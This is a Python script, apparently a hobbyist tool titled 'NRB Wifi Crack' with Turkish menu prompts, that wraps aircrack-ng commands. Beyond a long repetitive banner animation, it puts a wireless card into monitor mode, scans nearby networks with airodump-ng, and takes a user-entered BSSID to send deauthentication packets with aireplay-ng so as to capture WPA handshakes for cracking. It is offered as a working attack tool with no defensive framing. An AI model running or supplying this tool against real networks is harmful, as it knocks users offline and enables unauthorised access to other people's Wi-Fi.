from time import sleep
from os import *
from subprocess import *
def dondurme():
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PEople see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeOple see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeoPle see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeopLe see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeoplE see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People See what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People sEe what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People seE what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see What they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see wHat they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see whAt they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see whaT they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what They see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what tHey see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what thEy see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what theY see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they See. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they sEe. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they seE. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'Ll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'lL show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll Show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll sHow you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll shOw you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll shoW you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show You what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show yOu what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show yoU what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you What you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you wHat you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you whAt you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you whaT you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what You don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what yOu don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what yoU don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you Don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you dOn't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you doN't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don'T want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't Want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't wAnt to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't waNt to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't wanT to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want To see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want tO see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to See ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to sEe ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to seE ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PEople see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeOple see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeoPle see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeopLe see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("PeoplE see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People See what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People sEe what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People seE what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see What they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see wHat they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see whAt they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see whaT they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what They see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what tHey see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what thEy see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what theY see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they See. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they sEe. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they seE. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'Ll show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'lL show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll Show you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll sHow you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll shOw you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll shoW you what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show You what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show yOu what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show yoU what you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you What you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you wHat you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you whAt you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you whaT you don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what You don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what yOu don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what yoU don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you Don't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you dOn't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you doN't want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don'T want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't Want to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't wAnt to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't waNt to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't wanT to see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want To see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want tO see ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to See ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to sEe ...")
    sleep(0.1)
    system("clear")
    system("figlet NRB")
    print("People see what they see. I'll show you what you don't want to seE ...")
    sleep(0.1)
def monitor_mod_open():
    system("clear")
    system("figlet NRB")
    system("airmon-ng start wlan0")
    sleep(2)
    print("[+] Monitor Mod Etkin")
    sleep(3)
    x = "Monitor Mod Aktif"
    return x
def monitor_mod_close():
    system("clear")
    system("figlet NRB")
    system("airmon-ng stop wlan0mon")
    sleep(3)
    print("[+] Managed Mod Etkin!!")
    x = "Managed Mod Aktif"
    return x
def wifi_search():
    try:
        system("clear")
        system("figlet NRB")
        print("[!] Aramayi durdurmak icin Ctrl+C basiniz.")
        sleep(3)
        system("airodump-ng wlan0mon")
    except:
        print("[!] Failed Run")
    finally:
        sleep(3)
        print("[!] Bssid ve channel degerlerini bir yere kaydedin")
        sleep(4)
def guncelleme():
    system("clear")
    system("figlet NRB")
    sleep(2)
    print("[+] Guncellemeye hazirlaniliyor")
    sleep(2)
    system("apt-get update")
def guncelleme_kur():
    system("clear")
    system("figlet NRB")
    sleep(2)
    print("[+] Guncelleme kurulumlarina hazirlaniliyor")
    sleep(2)
    system("apt-get upgrade")
def terminal():
    run(['python','altsurec.py'])
def handshake_yakalama():
    system("clear")
    system("figlet NRB")
    bssid1 = str(input("Bssid1:"))
    system("clear")
    system("figlet NRB")
    bssid2 = str(input("Bssid2:"))
    system("clear")
    system("figlet NRB")
    bssid3 = str(input("Bssid3:"))
    system("clear")
    system("figlet NRB")
    bssid4 = str(input("Bssid4:"))
    system("clear")
    system("figlet NRB")
    bssid5 = str(input("Bssid5:"))
    system("clear")
    system("figlet NRB")
    bssid6 = str(input("Bssid6:"))
    system("clear")
    system("figlet NRB")
    sleep(2)
    print("Bilgiler kaydediliyor.")
    sleep(3)
    print("[+] Handshake yakalama islemi uzun surebilir.\n[+] Lutfen bekleyiniz...")
    sleep(3)
    system("aireplay-ng --deauth 10 -a {}:{}:{}:{}:{}:{} wlan0mon".format(bssid1,bssid2,bssid3,bssid4,bssid5,bssid6))

dondurme()
try:
    while True:
        rcode = call(['python', 'altsurec.py'])
        system("clear")
        system("figlet NRB")
        sleep(3)
        sleep(1)
        print("""

                      NRB Wifi Crack

              1-Monitor Moda Gec
              2-Managed Moda Gec
              3-Wifi Taramasi Baslat
              4-Handshake Yakala
              5-Sistem Guncelle
              6-Sistem Guncellemelerini Kur

        """)
        aaa = int(input("Secim:"))
        if aaa == 1:
            system("clear")
            monitor_mod_open()
        elif aaa == 2:
            system("clear")
            monitor_mod_close()
        elif aaa ==3:
            system("clear")
            wifi_search()
        elif aaa == 4:
            system("clear")
            handshake_yakalama()
        elif aaa == 5:
            sleep(2)
            guncelleme()
        elif aaa == 6:
            guncelleme_kur()

        else:
            print("Hatali islem")
except:
    print("[!] Bir Yerde Hata Olustu!!!")
